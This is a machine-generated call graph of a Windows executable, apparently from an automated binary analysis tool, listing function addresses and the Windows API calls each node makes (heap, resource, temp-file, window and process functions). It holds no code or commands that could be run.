140005599 9745->9746 9747 140012450 4 API calls 9746->9747 9748 1400055ae 9747->9748 10338 140012520 TlsGetValue 9748->10338 9750 1400055b7 10339 1400125d0 TlsGetValue 9750->10339 9752 1400055c3 10340 14000309a 9752->10340 9754 1400055d7 9755 140012360 HeapFree 9754->9755 9756 1400055fd 9755->9756 9757 140012360 HeapFree 9756->9757 9758 14000560f 9757->9758 9759 140012360 HeapFree 9758->9759 9760 140005621 9759->9760 9761 140012360 HeapFree 9760->9761 9762 140005633 9761->9762 9763 140012360 HeapFree 9762->9763 9764 140005648 9763->9764 9765 140012360 HeapFree 9764->9765 9766 14000565a 9765->9766 9767 140012360 HeapFree 9766->9767 9768 14000566f 9767->9768 9769 140012360 HeapFree 9768->9769 9770 140005681 9769->9770 9771 140012360 HeapFree 9770->9771 9772 140005693 9771->9772 9773 140012360 HeapFree 9772->9773 9774 1400056a5 9773->9774 9775 1400121c0 GetLastError TlsGetValue SetLastError 9774->9775 9775->8688 9776->8694 9777->8710 9778->8712 9779->8720 9780->8722 9781->8724 9783 1400126d0 3 API calls 9782->9783 9784 14000daca GetCurrentDirectoryW 9783->9784 9785 14000dae1 9784->9785 10471 140012900 TlsGetValue 9785->10471 9787 14000663c 9788 140012520 TlsGetValue 9787->9788 9788->8728 9789->8730 9790->8736 9791->8738 9792->8740 9794 1400029e1 9793->9794 9794->9794 9795 1400123e0 21 API calls 9794->9795 9796 1400029fb 9795->9796 9797 1400122f0 2 API calls 9796->9797 9798 140002a11 9797->9798 9799 1400122f0 2 API calls 9798->9799 9800 140002a2b 9799->9800 9801 1400122f0 2 API calls 9800->9801 9802 140002a45 9801->9802 9803 140007364 2 API calls 9802->9803 9805 140002af8 9802->9805 9804 140002ac7 GetExitCodeProcess 9803->9804 9804->9802 9806 140012360 HeapFree 9805->9806 9807 140002b18 9806->9807 9808 140012360 HeapFree 9807->9808 9809 140002b2a 9808->9809 9813 1400072c5 EnterCriticalSection 9812->9813 9814 140006598 9812->9814 9821 140007309 9813->9821 9814->8707 9815 140007313 9818 140011cb0 HeapAlloc 9815->9818 9816 1400072db WaitForSingleObject 9817 1400072ee CloseHandle 9816->9817 9816->9821 9820 140011c68 HeapFree 9817->9820 9819 140007336 LeaveCriticalSection 9818->9819 9819->9814 9820->9821 9821->9815 9821->9816 9823 140003dea 9822->9823 9823->9823 9824 1400123e0 21 API calls 9823->9824 9825 140003e04 9824->9825 9826 1400122f0 2 API calls 9825->9826 9827 140003e17 9826->9827 9828 140003e6d 9827->9828 10472 1400121c0 GetLastError TlsGetValue SetLastError 9827->10472 10474 1400121c0 GetLastError TlsGetValue SetLastError 9828->10474 9831 140003e77 10475 1400121c0 GetLastError TlsGetValue SetLastError 9831->10475 9832 140003e30 10473 1400121c0 GetLastError TlsGetValue SetLastError 9832->10473 9835 140003e8b 10476 1400121c0 GetLastError TlsGetValue SetLastError 9835->10476 9836 140003e44 9838 14000ca00 4 API calls 9836->9838 9840 140003e5e 9838->9840 9839 140003e9b 10477 1400121c0 GetLastError TlsGetValue SetLastError 9839->10477 9842 140012210 3 API calls 9840->9842 9842->9828 9843 140003eab 9844 140010ba0 6 API calls 9843->9844 9845 140003ec7 9844->9845 10478 1400125d0 TlsGetValue 9845->10478 9847 140003ed1 9848 140007dc0 6 API calls 9847->9848 9849 140003ee4 9848->9849 9850 140012210 3 API calls 9849->9850 9851 140003ef3 FindResourceW 9850->9851 9852 140003f1c 9851->9852 9853 14000402d 9851->9853 9854 14000350f 21 API calls 9852->9854 9855 1400124c0 wcscmp 9853->9855 9856 140003f2d 9854->9856 9857 14000403c 9855->9857 9862 140001284 8 API calls 9856->9862 9858 140004067 9857->9858 9859 14000404c 9857->9859 9860 140004070 9857->9860 9863 140012360 HeapFree 9858->9863 9864 140007284 7 API calls 9859->9864 10483 140003592 9860->10483 9865 140003f66 9862->9865 9866 14000408e 9863->9866 9864->9858 10479 1400121c0 GetLastError TlsGetValue SetLastError 9865->10479 9868 140012360 HeapFree 9866->9868 9870 1400040a0 9868->9870 9869 140003f70 10480 1400121c0 GetLastError TlsGetValue SetLastError 9869->10480 9870->8707 9872 140003f84 9873 14000ca80 5 API calls 9872->9873 9874 140003fa1 9873->9874 9875 140012210 3 API calls 9874->9875 9876 140003fb2 9875->9876 10481 1400121c0 GetLastError TlsGetValue SetLastError 9876->10481 9878 140003fe3 10482 1400121c0 GetLastError TlsGetValue SetLastError 9878->10482 9880 140003ff7 9881 140007e50 5 API calls 9880->9881 9882 14000401c 9881->9882 9883 140012210 3 API calls 9882->9883 9883->9853 9899->9119 9900->9121 9902 1400126d0 3 API calls 9901->9902 9903 140004868 9902->9903 9903->9124 9904->9127 9905->9131 9907 1400123e0 21 API calls 9906->9907 9908 140003527 9907->9908 9908->9154 9909->9164 9910->9168 9911->9172 9912->9176 9914 14000caa8 9913->9914 9915 14000ca00 9913->9915 9916 1400126d0 3 API calls 9914->9916 9918 1400126d0 3 API calls 9915->9918 9917 14000cac5 9916->9917 10021 140012900 TlsGetValue 9917->10021 9919 14000ca34 9918->9919 9922 14000ca3b memmove 9919->9922 9923 14000ca4c 9919->9923 9921 14000caf1 9921->9180 9922->9923 9923->9180 9924->9184 9927 140007f00 9925->9927 9926 140012630 TlsGetValue 9928 140007fa9 9926->9928 9927->9926 9929 1400126d0 3 API calls 9928->9929 9930 140007fb7 9929->9930 9931 140002d0e 9930->9931 10022 140012850 TlsGetValue 9930->10022 9931->9189 9933->9193 9934->9195 9935->9197 9936->9199 9937->9203 9938->9209 9939->9211 9940->9213 9941->9215 9943 140007644 TlsGetValue 9942->9943 9950 140007501 9942->9950 9943->9217 9945 140012630 TlsGetValue 9947 1400075a6 9945->9947 9946 140007560 wcsncmp 9946->9950 9948 1400075ca 9947->9948 10023 1400126a0 TlsGetValue 9947->10023 9952 1400126d0 3 API calls 9948->9952 9949 140007592 9949->9945 9950->9946 9950->9949 9954 1400075d4 9952->9954 9953 1400075b9 memmove 9953->9948 9955 1400075ee 9954->9955 9956 1400075e0 wcsncpy 9954->9956 9955->9217 9956->9955 9957->9219 9958->9221 9959->9223 9960->9227 9961->9229 10024 14000b5d8 9962->10024 9964 14000b790 9965 14000b5d8 2 API calls 9964->9965 9966 14000b79b 9965->9966 9967 14000b5d8 2 API calls 9966->9967 9968 14000b7a6 9967->9968 9969 14000b7b2 GetStockObject 9968->9969 9970 14000b7c3 LoadIconW LoadCursorW RegisterClassExW 9968->9970 9969->9970 10027 14000be5c GetForegroundWindow 9970->10027 9975 14000b859 IsWindowEnabled 9976 14000b87a 9975->9976 9977 14000b863 EnableWindow 9975->9977 9978 14000be5c 3 API calls 9976->9978 9977->9976 9979 14000b886 GetSystemMetrics GetSystemMetrics CreateWindowExW 9978->9979 9980 14000b902 6 API calls 9979->9980 9981 14000bb96 9979->9981 9983 14000ba12 SendMessageW wcslen wcslen SendMessageW 9980->9983 9984 14000ba53 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 9980->9984 9982 14000bba4 9981->9982 10041 140012810 TlsGetValue 9981->10041 9986 14000bba9 HeapFree 9982->9986 9987 14000bbbb 9982->9987 9983->9984 9988 14000bb48 9984->9988 9986->9987 9989 14000bbd2 9987->9989 9990 14000bbc0 HeapFree 9987->9990 9991 14000bb51 9988->9991 9992 14000bb0a GetMessageW 9988->9992 9994 14000bbd7 HeapFree 9989->9994 9995 14000bbe9 9989->9995 9990->9989 9996 14000bb56 DestroyAcceleratorTable 9991->9996 9997 14000bb5f 9991->9997 9992->9991 9993 14000bb20 TranslateAcceleratorW 9992->9993 9993->9988 9999 14000bb34 TranslateMessage DispatchMessageW 9993->9999 9994->9995 9995->9231 9996->9997 9997->9981 9998 14000bb68 wcslen 9997->9998 10000 1400126d0 3 API calls 9998->10000 9999->9988 10001 14000bb77 wcscpy HeapFree 10000->10001 10001->9981 10002->9240 10003->9242 10004->9244 10005->9246 10006->9250 10007->9259 10008->9261 10009->9263 10010->9267 10011->9269 10013 14000be5c 3 API calls 10012->10013 10014 14000b596 10013->10014 10015 14000bf44 7 API calls 10014->10015 10016 14000b5a3 MessageBoxW 10015->10016 10017 14000bf44 7 API calls 10016->10017 10018 14000b5bf 10017->10018 10018->9271 10019->9165 10020->9173 10021->9921 10022->9931 10023->9953 10025 14000b5ea wcslen HeapAlloc 10024->10025 10026 14000b60e 10024->10026 10025->10026 10026->9964 10028 14000b83f 10027->10028 10029 14000be76 GetWindowThreadProcessId GetCurrentProcessId 10027->10029 10030 14000bf44 10028->10030 10029->10028 10031 14000bf57 EnumWindows 10030->10031 10032 14000bfbb 10030->10032 10033 14000bf77 GetCurrentThreadId 10031->10033 10038 14000b84d 10031->10038 10034 14000bfc7 GetCurrentThreadId 10032->10034 10036 14000bfdb EnableWindow 10032->10036 10032->10038 10039 14000bff0 SetWindowPos 10032->10039 10040 140011c68 HeapFree 10032->10040 10035 14000bf85 10033->10035 10034->10032 10035->10033 10037 14000bf8b SetWindowPos 10035->10037 10035->10038 10036->10032 10037->10035 10038->9975 10038->9976 10039->10032 10040->10032 10041->9982 10042->9280 10043->9283 10045 1400126d0 3 API calls 10044->10045 10046 14000d9eb GetTempPathW LoadLibraryW 10045->10046 10047 14000da13 GetProcAddress 10046->10047 10048 14000da3e 10046->10048 10049 14000da35 FreeLibrary 10047->10049 10050 14000da28 GetLongPathNameW 10047->10050 10077 140012900 TlsGetValue 10048->10077 10049->10048 10050->10049 10052 140001f92 10052->9286 10053->9290 10054->9292 10056 14000ca20 10055->10056 10056->10056 10057 1400126d0 3 API calls 10056->10057 10058 14000ca34 10057->10058 10059 14000ca3b memmove 10058->10059 10060 140001ff7 10058->10060 10059->10060 10060->9296 10062 14000da74 10061->10062 10063 140002014 10062->10063 10064 14000da92 DeleteFileW 10062->10064 10065 14000da87 SetFileAttributesW 10062->10065 10066 14000d914 10063->10066 10064->10063 10065->10064 10067 14000d924 wcsncpy wcslen 10066->10067 10068 140002020 GetTempFileNameW 10066->10068 10069 14000d98a CreateDirectoryW 10067->10069 10070 14000d95c 10067->10070 10071 1400121c0 GetLastError TlsGetValue SetLastError 10068->10071 10069->10068 10070->10069 10071->9303 10072->9305 10073->9315 10074->9317 10075->9325 10076->9327 10077->10052 10078->9342 10079->9344 10081 14000dc91 SetCurrentDirectoryW 10080->10081 10082 140006901 10080->10082 10081->10082 10082->9355 10083->9435 10084->9468 10085->9377 10086->9386 10087->9378 10088->9385 10089->9402 10091 1400126d0 3 API calls 10090->10091 10092 14000db3e 10091->10092 10093 14000db4a LoadLibraryW 10092->10093 10103 14000dbfb 10092->10103 10094 14000dbd5 10093->10094 10095 14000db5f GetProcAddress 10093->10095 10148 14000dca4 SHGetFolderLocation 10094->10148 10096 14000dbc4 FreeLibrary 10095->10096 10097 14000db7b 10095->10097 10096->10094 10099 14000dc61 10096->10099 10097->10096 10105 14000db92 wcscpy wcscat wcslen CoTaskMemFree 10097->10105 10154 140012900 TlsGetValue 10099->10154 10101 14000dca4 4 API calls 10101->10099 10103->10099 10103->10101 10104 140004aff 10104->9423 10105->10096 10106->9391 10107->9408 10108->9396 10109->9414 10110->9409 10111->9429 10112->9415 10113->9434 10114->9430 10115->9441 10116->9436 10117->9455 10118->9442 10119->9460 10120->9456 10121->9470 10123 14000bce1 memset LoadLibraryW 10122->10123 10124 14000bccf CoInitialize 10122->10124 10125 14000be22 10123->10125 10126 14000bd12 GetProcAddress GetProcAddress wcsncpy wcslen 10123->10126 10124->10123 10128 1400126d0 3 API calls 10125->10128 10127 14000bd73 10126->10127 10129 14000be5c 3 API calls 10127->10129 10130 14000be2c 10128->10130 10131 14000bd8b 10129->10131 10155 140012900 TlsGetValue 10130->10155 10133 14000bf44 7 API calls 10131->10133 10134 14000bdb8 10133->10134 10136 14000bf44 7 API calls 10134->10136 10135 140004dd7 10135->9479 10137 14000bdca 10136->10137 10138 14000be15 FreeLibrary 10137->10138 10139 1400126d0 3 API calls 10137->10139 10138->10125 10138->10130 10140 14000bddc CoTaskMemFree wcslen 10139->10140 10140->10138 10142 14000be10 10140->10142 10142->10138 10144 140007375 timeBeginPeriod 10143->10144 10145 14000738a Sleep 10143->10145 10144->10145 10146->9457 10147->9465 10149 14000dbe2 wcscat wcslen 10148->10149 10150 14000dcd7 SHGetPathFromIDListW 10148->10150 10149->10099 10151 14000dce9 wcslen 10150->10151 10152 14000dd0a CoTaskMemFree 10150->10152 10151->10152 10153 14000dcf8 10151->10153 10152->10149 10153->10152 10154->10104 10155->10135 10156->9501 10157->9503 10158->9509 10159->9513 10160->9530 10161->9532 10162->9541 10163->9546 10165 1400031fe 10164->10165 10165->10165 10166 1400123e0 21 API calls 10165->10166 10185 140003218 10166->10185 10167 1400032ff 10230 1400121c0 GetLastError TlsGetValue SetLastError 10167->10230 10169 140003309 10231 1400121c0 GetLastError TlsGetValue SetLastError 10169->10231 10171 1400121c0 GetLastError TlsGetValue SetLastError 10171->10185 10172 14000331d GetCommandLineW 10174 14000ca00 4 API calls 10172->10174 10173 140007c90 3 API calls 10173->10185 10175 140003343 10174->10175 10177 140012210 3 API calls 10175->10177 10176 140012210 TlsGetValue HeapAlloc HeapReAlloc 10176->10185 10178 140003352 10177->10178 10232 1400121c0 GetLastError TlsGetValue SetLastError 10178->10232 10180 140003361 10182 140012450 4 API calls 10180->10182 10181 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 10181->10185 10183 140003370 10182->10183 10184 140012210 3 API calls 10183->10184 10186 14000337f PathRemoveArgsW 10184->10186 10185->10167 10185->10171 10185->10173 10185->10176 10185->10181 10187 14000339d 10186->10187 10188 140003464 10187->10188 10233 1400121c0 GetLastError TlsGetValue SetLastError 10187->10233 10189 14000c45c SetEnvironmentVariableW 10188->10189 10192 140003473 10189->10192 10191 1400033ba 10193 140012450 4 API calls 10191->10193 10249 1400121c0 GetLastError TlsGetValue SetLastError 10192->10249 10195 1400033d3 10193->10195 10234 1400121c0 GetLastError TlsGetValue SetLastError 10195->10234 10196 140003482 10198 140012450 4 API calls 10196->10198 10200 140003491 10198->10200 10199 1400033e1 10235 1400121c0 GetLastError TlsGetValue SetLastError 10199->10235 10250 1400125a0 TlsGetValue 10200->10250 10203 1400033f1 10236 1400121c0 GetLastError TlsGetValue SetLastError 10203->10236 10204 14000349c 10206 140012360 HeapFree 10204->10206 10208 1400034bb 10206->10208 10207 140003401 10237 1400121c0 GetLastError TlsGetValue SetLastError 10207->10237 10210 140012360 HeapFree 10208->10210 10212 1400034cd 10210->10212 10211 140003411 10238 140008010 10211->10238 10214 140012360 HeapFree 10212->10214 10216 1400034df 10214->10216 10218 140012360 HeapFree 10216->10218 10220 1400034f1 10218->10220 10219 140003441 10221 140007ef0 5 API calls 10219->10221 10223 140012360 HeapFree 10220->10223 10222 140003454 10221->10222 10224 140012210 3 API calls 10222->10224 10225 140002759 10223->10225 10224->10188 10225->9551 10226->9557 10227->9542 10228->9554 10229->9562 10230->10169 10231->10172 10232->10180 10233->10191 10234->10199 10235->10203 10236->10207 10237->10211 10239 140008018 10238->10239 10239->10239 10240 140012630 TlsGetValue 10239->10240 10241 140008082 10240->10241 10242 1400126d0 3 API calls 10241->10242 10243 14000808e 10242->10243 10247 14000809e 10243->10247 10251 140012850 TlsGetValue 10243->10251 10246 140003437 10248 1400125d0 TlsGetValue 10246->10248 10252 140012900 TlsGetValue 10247->10252 10248->10219 10249->10196 10250->10204 10251->10247 10252->10246 10253->9577 10254->9580 10255->9583 10256->9586 10257->9591 10258->9598 10259->9600 10260->9602 10261->9604 10262->9608 10263->9614 10264->9616 10265->9618 10266->9620 10267->9624 10268->9630 10269->9632 10270->9634 10271->9636 10272->9640 10273->9646 10274->9648 10275->9650 10276->9652 10277->9656 10278->9662 10279->9664 10281 1400123e0 21 API calls 10280->10281 10282 1400057b1 10281->10282 10283 1400122f0 2 API calls 10282->10283 10284 1400057d1 FindResourceW 10283->10284 10285 1400058cc 10284->10285 10286 1400057fe 10284->10286 10400 1400121c0 GetLastError TlsGetValue SetLastError 10285->10400 10287 14000350f 21 API calls 10286->10287 10290 14000580f 10287->10290 10289 1400058e5 10291 140012450 4 API calls 10289->10291 10353 140001284 10290->10353 10292 1400058f4 10291->10292 10401 1400125a0 TlsGetValue 10292->10401 10295 1400058ff 10301 140012360 HeapFree 10295->10301 10297 140005853 10373 140006960 10297->10373 10298 14000587b 10388 1400121c0 GetLastError TlsGetValue SetLastError 10298->10388 10303 14000591e 10301->10303 10302 140005885 10389 1400121c0 GetLastError TlsGetValue SetLastError 10302->10389 10305 140012360 HeapFree 10303->10305 10307 140005930 10305->10307 10306 140005899 10390 14000cb60 10306->10390 10307->9666 10308 14000586c 10402 140012600 TlsGetValue 10308->10402 10312 140012210 3 API calls 10312->10285 10313->9668 10314->9670 10315->9676 10316->9678 10317->9684 10318->9686 10319->9692 10320->9694 10321->9700 10322->9702 10323->9704 10324->9706 10325->9710 10326->9712 10442 140008260 10327->10442 10330->9718 10331->9720 10332->9722 10333->9724 10334->9728 10335->9730 10336->9736 10337->9738 10338->9750 10339->9752 10341 1400122f0 2 API calls 10340->10341 10342 1400030c5 10341->10342 10343 1400122f0 2 API calls 10342->10343 10345 1400030dc 10343->10345 10344 140003122 10349 140012360 HeapFree 10344->10349 10345->10344 10346 14000e500 2 API calls 10345->10346 10347 140003113 10346->10347 10348 14000dd30 11 API calls 10347->10348 10348->10344 10350 140003156 10349->10350 10351 140012360 HeapFree 10350->10351 10352 140003168 10351->10352 10352->9754 10354 14000129f 10353->10354 10354->10354 10355 1400122f0 2 API calls 10354->10355 10356 1400012ca 10355->10356 10357 1400073a0 2 API calls 10356->10357 10358 1400012d8 10357->10358 10359 140011d30 4 API calls 10358->10359 10360 14000131b 10359->10360 10361 140011d30 4 API calls 10360->10361 10362 14000134f 10361->10362 10363 140011d30 4 API calls 10362->10363 10364 140001699 10363->10364 10365 140011d30 4 API calls 10364->10365 10366 1400016cd 10365->10366 10367 140012360 HeapFree 10366->10367 10368 1400016ff 10367->10368 10369 140011ef4 2 API calls 10368->10369 10370 140001711 10369->10370 10371 140011ef4 2 API calls 10370->10371 10372 140001723 10371->10372 10372->10297 10372->10298 10374 1400123e0 21 API calls 10373->10374 10375 140006982 10374->10375 10376 1400122f0 2 API calls 10375->10376 10377 140006995 10376->10377 10379 1400069b0 10377->10379 10403 140003174 10377->10403 10387 1400069c6 10379->10387 10410 14000e0a0 10379->10410 10381 140012360 HeapFree 10383 140006a4c 10381->10383 10383->10308 10384 140006a04 10386 14000dd30 11 API calls 10384->10386 10386->10387 10387->10381 10388->10302 10389->10306 10391 14000cb92 10390->10391 10395 14000cbea 10390->10395 10392 1400126d0 3 API calls 10391->10392 10393 14000cbb4 10392->10393 10441 140012900 TlsGetValue 10393->10441 10394 14000cc44 MultiByteToWideChar 10398 1400126d0 3 API calls 10394->10398 10395->10394 10397 1400058bd 10397->10312 10399 14000cc6a MultiByteToWideChar 10398->10399 10399->10397 10400->10289 10401->10295 10402->10295 10404 1400122f0 2 API calls 10403->10404 10405 140003197 10404->10405 10406 14000dd30 11 API calls 10405->10406 10407 1400031c9 10405->10407 10406->10407 10408 140012360 HeapFree 10407->10408 10409 1400031eb 10408->10409 10409->10379 10429 1400112a8 EnterCriticalSection 10410->10429 10412 14000e0cc 10413 14000e0d8 CreateFileW 10412->10413 10419 1400069d8 10412->10419 10414 14000e10f CreateFileW 10413->10414 10415 14000e13d 10413->10415 10414->10415 10416 14000e165 10414->10416 10415->10416 10417 14000e14d HeapAlloc 10415->10417 10418 1400111dc 4 API calls 10416->10418 10416->10419 10417->10416 10418->10419 10419->10384 10419->10387 10420 14000e590 10419->10420 10421 14000e5b0 10420->10421 10424 14000e604 10420->10424 10422 140011248 2 API calls 10421->10422 10421->10424 10423 14000e5c4 10422->10423 10423->10424 10425 14000e5f1 WriteFile 10423->10425 10426 14000e5d5 10423->10426 10424->10384 10425->10424 10427 14000e620 5 API calls 10426->10427 10428 14000e5dd 10427->10428 10428->10384 10430 1400112e3 10429->10430 10431 1400112d0 10429->10431 10433 140011312 10430->10433 10434 1400112e9 HeapReAlloc 10430->10434 10439 140011cb0 HeapAlloc 10431->10439 10436 14001132d HeapAlloc 10433->10436 10437 14001131d 10433->10437 10434->10433 10436->10437 10438 140011352 LeaveCriticalSection 10437->10438 10438->10412 10440 1400112de 10439->10440 10440->10438 10441->10397 10443 1400082e4 10442->10443 10444 140008397 10443->10444 10445 14000830a 10443->10445 10446 140012630 TlsGetValue 10444->10446 10456 140008363 wcsncpy 10445->10456 10458 140005477 10445->10458 10447 14000839f 10446->10447 10448 1400083ba 10447->10448 10449 1400083aa _wcsdup 10447->10449 10450 140012630 TlsGetValue 10448->10450 10449->10448 10451 1400083c2 10450->10451 10452 1400083d8 10451->10452 10453 1400083cd _wcsdup 10451->10453 10454 140012630 TlsGetValue 10452->10454 10453->10452 10455 1400083e0 10454->10455 10457 1400083eb _wcsdup 10455->10457 10461 1400083f8 10455->10461 10456->10445 10457->10461 10458->9715 10459 1400126d0 3 API calls 10460 140008481 10459->10460 10462 1400084ed wcsncpy 10460->10462 10463 140008488 10460->10463 10464 14000850e 10460->10464 10461->10459 10462->10464 10465 140008575 10463->10465 10466 14000856d free 10463->10466 10464->10463 10470 1400085c0 wcsncpy 10464->10470 10467 140008587 10465->10467 10468 14000857f free 10465->10468 10466->10465 10467->10458 10469 140008591 free 10467->10469 10468->10467 10469->10458 10470->10464 10471->9787 10472->9832 10473->9836 10474->9831 10475->9835 10476->9839 10477->9843 10478->9847 10479->9869 10480->9872 10481->9878 10482->9880 10484 1400035a1 10483->10484 10484->10484 10485 1400123e0 21 API calls 10484->10485 10486 1400035bb 10485->10486 10487 1400122f0 2 API calls 10486->10487 10488 1400035d1 10487->10488 10535 140001735 10488->10535 10490 140003bd0 10585 1400121c0 GetLastError TlsGetValue SetLastError 10490->10585 10492 140003be4 10498 140010ba0 6 API calls 10533 1400035da 10498->10533 10503 140007dc0 6 API calls 10503->10533 10509 140007ce0 5 API calls 10509->10533 10511 140012210 3 API calls 10513 1400036d7 FindResourceW FindResourceW 10511->10513 10513->10533 10517 14000350f 21 API calls 10517->10533 10521 140003174 14 API calls 10521->10533 10522 140001284 8 API calls 10522->10533 10523 14000d9ac SetFileAttributesW 10523->10533 10524 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 10524->10533 10525 1400121c0 GetLastError TlsGetValue SetLastError 10525->10533 10526 140003cc9 37 API calls 10526->10533 10528 140006960 48 API calls 10528->10533 10530 1400125d0 TlsGetValue 10530->10533 10531 14000c45c SetEnvironmentVariableW 10531->10533 10533->10490 10533->10498 10533->10503 10533->10509 10533->10511 10533->10517 10533->10521 10533->10522 10533->10523 10533->10524 10533->10525 10533->10526 10533->10528 10533->10530 10533->10531 10534 140012210 TlsGetValue HeapAlloc HeapReAlloc 10533->10534 10576 140012520 TlsGetValue 10533->10576 10577 140008110 10533->10577 10580 14000d6a0 10533->10580 10534->10533 10536 14000173f 10535->10536 10536->10536 10537 1400123e0 21 API calls 10536->10537 10538 140001759 10537->10538 10567 140001956 10538->10567 10568 14000176a 10538->10568 10539 140012360 HeapFree 10540 140001dfc 10539->10540 10542 140012360 HeapFree 10540->10542 10541 1400018d9 10543 1400073a0 2 API calls 10541->10543 10545 140001e11 10542->10545 10546 1400018e3 10543->10546 10544 1400121c0 GetLastError TlsGetValue SetLastError 10544->10568 10547 140012360 HeapFree 10545->10547 10549 14000190c WriteFile 10546->10549 10548 140001e23 10547->10548 10550 140012360 HeapFree 10548->10550 10551 14000193b 10549->10551 10553 140001e35 10550->10553 10556 1400120d0 3 API calls 10551->10556 10552 1400074e0 9 API calls 10552->10568 10555 140012360 HeapFree 10553->10555 10554 1400124c0 wcscmp 10554->10567 10557 140001e47 10555->10557 10558 140001951 10556->10558 10557->10533 10558->10539 10559 1400121c0 GetLastError TlsGetValue SetLastError 10559->10567 10560 140003174 14 API calls 10560->10568 10562 140003cc9 37 API calls 10562->10568 10564 1400074e0 9 API calls 10564->10567 10566 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 10566->10568 10567->10554 10567->10558 10567->10559 10567->10564 10569 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 10567->10569 10570 1400079d0 10 API calls 10567->10570 10572 140012210 TlsGetValue HeapAlloc HeapReAlloc 10567->10572 10573 14000d914 3 API calls 10567->10573 10590 140007920 10567->10590 10598 140012520 TlsGetValue 10567->10598 10599 140012550 TlsGetValue 10567->10599 10600 14000d9ac 10567->10600 10603 1400056b4 10567->10603 10568->10541 10568->10544 10568->10552 10568->10558 10568->10560 10568->10562 10568->10566 10571 140012210 TlsGetValue HeapAlloc HeapReAlloc 10568->10571 10569->10567 10570->10567 10571->10568 10572->10567 10573->10567 10576->10533 10578 1400126d0 3 API calls 10577->10578 10579 14000812e 10578->10579 10579->10579 10581 14001147c 4 API calls 10580->10581 10582 14000d6b6 10581->10582 10583 14000d6c2 memset 10582->10583 10584 14000d6d6 10582->10584 10583->10584 10584->10533 10585->10492 10591 14000794b 10590->10591 10592 140012630 TlsGetValue 10591->10592 10593 140007968 10592->10593 10594 1400126d0 3 API calls 10593->10594 10595 140007975 10594->10595 10597 140007985 10595->10597 10622 140012850 TlsGetValue 10595->10622 10597->10567 10598->10567 10599->10567 10601 14000d9b7 SetFileAttributesW 10600->10601 10602 14000d9bd 10600->10602 10601->10602 10602->10567 10604 1400123e0 21 API calls 10603->10604 10605 1400056ca 10604->10605 10606 1400122f0 2 API calls 10605->10606 10607 1400056dd 10606->10607 10623 14000cdfc 10607->10623 10610 140012360 HeapFree 10612 140005787 10610->10612 10611 14000cdfc 11 API calls 10613 140005710 10611->10613 10612->10567 10614 14000d6a0 5 API calls 10613->10614 10615 140005727 10614->10615 10621 14000575a 10621->10610 10622->10597 10629 14000cf74 10623->10629 10625 14000ce11 10626 1400056f2 10625->10626 10635 14000d02c 10625->10635 10626->10611 10626->10621 10630 14000cfa2 10629->10630 10632 14000cfe2 10629->10632 10650 14000d3a4 10630->10650 10633 14000cfa7 10632->10633 10634 14000cff8 wcscmp 10632->10634 10633->10625 10634->10632 10634->10633 10636 14000d073 10635->10636 10637 14000d04c 10635->10637 10640 14000d3a4 tolower 10636->10640 10642 14000d08f 10636->10642 10638 14000cf74 2 API calls 10637->10638 10639 14000d051 10638->10639 10639->10636 10641 14000d059 10639->10641 10640->10642 10643 14000d06e 10641->10643 10647 140016bb0 HeapFree 10641->10647 10654 14001147c 10642->10654 10647->10643 10651 14000d3c7 tolower 10650->10651 10652 14000d3b8 10651->10652 10653 14000d3d0 10651->10653 10652->10651 10653->10633 10655 1400114a4 10654->10655 10656 14001149a EnterCriticalSection 10654->10656 10656->10655 10688->8769 10689->8771 10690->8773 10691->8775 10692->8779 10693->8785 10694->8787 10695->8789 10696->8791 10697->8795 10698->8803 10699->8805 10700->8809 10701->8811 10702->8820 10703->8822 10704->8824 10705->8826 10706->8830 10707->8836 10708->8838 10709->8840 10710->8842 10711->8846 10712->8852 10713->8854 10714->8860 10715->8862 10716->8868 10717->8870 10718->8876 10719->8880 8169 140001284 8170 14000129f 8169->8170 8170->8170 8189 1400122f0 8170->8189 8174 1400012d8 8197 140011d30 8174->8197 8176 14000131b 8177 140011d30 4 API calls 8176->8177 8178 14000134f 8177->8178 8179 140011d30 4 API calls 8178->8179 8180 140001699 8179->8180 8181 140011d30 4 API calls 8180->8181 8182 1400016cd 8181->8182 8203 140012360 8182->8203 8187 140011ef4 2 API calls 8188 140001723 8187->8188 8190 1400012ca 8189->8190 8191 140012306 wcslen HeapAlloc 8189->8191 8193 1400073a0 WideCharToMultiByte 8190->8193 8211 140012880 8191->8211 8194 1400073f2 8193->8194 8195 140007424 8194->8195 8196 1400073fa WideCharToMultiByte 8194->8196 8195->8174 8196->8195 8198 140011ef4 2 API calls 8197->8198 8199 140011d69 8198->8199 8200 140011dc6 8199->8200 8201 140011d6e HeapAlloc 8199->8201 8200->8176 8201->8200 8202 140011d90 memset 8201->8202 8202->8200 8204 140012371 HeapFree 8203->8204 8205 1400016ff 8203->8205 8204->8205 8206 140011ef4 8205->8206 8207 140001711 8206->8207 8208 140011ef9 8206->8208 8207->8187 8209 140011f38 HeapFree 8208->8209 8213 140016bb0 8208->8213 8209->8207 8212 1400128a5 8211->8212 8212->8190 8215 140016bca 8213->8215 8214 140016ced 8214->8208 8215->8214 8216 140012360 HeapFree 8215->8216 8217 140016bb0 HeapFree 8215->8217 8216->8215 8217->8215 8218 14000309a 8219 1400122f0 2 API calls 8218->8219 8220 1400030c5 8219->8220 8221 1400122f0 2 API calls 8220->8221 8223 1400030dc 8221->8223 8222 140003122 8227 140012360 HeapFree 8222->8227 8223->8222 8231 14000e500 8223->8231 8228 140003156 8227->8228 8229 140012360 HeapFree 8228->8229 8230 140003168 8229->8230 8248 140011248 EnterCriticalSection 8231->8248 8234 14000dd30 8235 14000dd50 8234->8235 8236 14000dd3f 8234->8236 8237 140011248 2 API calls 8235->8237 8238 140011a81 8236->8238 8263 140011c48 EnterCriticalSection 8236->8263 8239 14000dd64 8237->8239 8238->8222 8241 14000dda6 8239->8241 8242 14000dd8e CloseHandle 8239->8242 8260 14000ddc0 8239->8260 8241->8222 8252 1400111dc EnterCriticalSection 8242->8252 8246 14000dd7b HeapFree 8246->8242 8247 140011a65 8247->8238 8264 140011bdc 8247->8264 8249 14001127a LeaveCriticalSection 8248->8249 8250 14001126c 8248->8250 8251 140003113 8249->8251 8250->8249 8251->8234 8253 140011200 8252->8253 8254 14001121f 8252->8254 8253->8254 8255 140011206 8253->8255 8268 140011c68 8254->8268 8257 140011213 memset 8255->8257 8258 14001122b LeaveCriticalSection 8255->8258 